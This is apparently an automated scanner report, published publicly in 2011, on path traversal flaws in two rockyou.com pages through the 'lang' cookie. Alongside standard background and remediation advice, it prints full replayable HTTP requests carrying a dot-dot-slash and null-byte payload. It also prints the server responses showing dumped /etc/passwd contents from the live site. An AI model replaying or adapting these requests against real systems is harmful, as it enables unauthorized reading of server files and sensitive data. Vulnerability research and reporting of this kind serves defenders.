CWE-23, Path Disclosure, Directory Traversal, CVSS 10, rockyou.com

The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.

Report generated by XSS.CX at Wed Apr 20 11:26:36 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

1. File path traversal

1.1. http://www.rockyou.com/fxtext/fxtext-create.php [lang cookie]

1.2. http://www.rockyou.com/show_my_gallery.php [lang cookie]

1. File path traversal
There are 2 instances of this issue:

/fxtext/fxtext-create.php [lang cookie]
/show_my_gallery.php [lang cookie]

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, and by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:

User-controllable data should be strictly validated before being passed to any filesystem operation. In particular, input containing dot-dot sequences should be blocked.
After validating user input, the application can use a suitable filesystem API to verify that the file to be accessed is actually located within the base directory used by the application. In Java, this can be achieved by instantiating a java.io.File object using the user-supplied filename and then calling the getCanonicalPath method on this object. If the string returned by this method does not begin with the name of the start directory, then the user has somehow bypassed the applicationís input filters, and the request should be rejected. In ASP.NET, the same check can be performed by passing the user-supplied filename to the System.Io.Path.GetFullPath method and checking the returned string in the same way as described for Java.
The directory used to store files that are accessed using user-controllable data can be located on a separate logical volume to other sensitive application and operating system files, so that these cannot be reached via path traversal attacks. In Unix-based systems, this can be achieved using a chrooted filesystem; on Windows, this can be achieved by mounting the base directory as a new logical drive and using the associated drive letter to access its contents.

1.1. http://www.rockyou.com/fxtext/fxtext-create.php [lang cookie] next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.rockyou.com
Path:	/fxtext/fxtext-create.php

Issue detail

The lang cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload en../../../../../../../../etc/passwd%00en was submitted in the lang cookie. The requested file was returned in the application's response.

Request

GET /fxtext/fxtext-create.php HTTP/1.1
Host: www.rockyou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lastlogin=1303164637; lang=en../../../../../../../../etc/passwd%00en; istack=3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; AAMBLFLAG=SET; sns_type=rockyou.com; ryuserid=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 23:51:27 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:51:26 GMT; path=/; domain=.rockyou.com
Set-Cookie: lastlogin=1303170687; expires=Wed, 27-Jul-2011 23:51:27 GMT; path=/; domain=.rockyou.com
Set-Cookie: sns_type=deleted; expires=Sun, 18-Apr-2010 23:51:26 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=7180 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85570

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapp
...[SNIP]...

1.2. http://www.rockyou.com/show_my_gallery.php [lang cookie] previous

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.rockyou.com
Path:	/show_my_gallery.php

Issue detail

Request

GET /show_my_gallery.php HTTP/1.1
Host: www.rockyou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lastlogin=1303164637; lang=en../../../../../../../../etc/passwd%00en; istack=3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; AAMBLFLAG=SET; sns_type=rockyou.com; ryuserid=deleted;

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 23:51:04 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Location: show_my_gallery2.php?
Set-Cookie: ctid=1; expires=Mon, 25-Apr-2011 23:51:04 GMT; path=/; domain=.rockyou.com
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:51:03 GMT; path=/; domain=.rockyou.com
Set-Cookie: lastlogin=1303170664; expires=Wed, 27-Jul-2011 23:51:04 GMT; path=/; domain=.rockyou.com
Set-Cookie: sns_type=deleted; expires=Sun, 18-Apr-2010 23:51:03 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=9310 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17248

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapp
...[SNIP]...

Report generated by XSS.CX at Wed Apr 20 11:26:36 CDT 2011.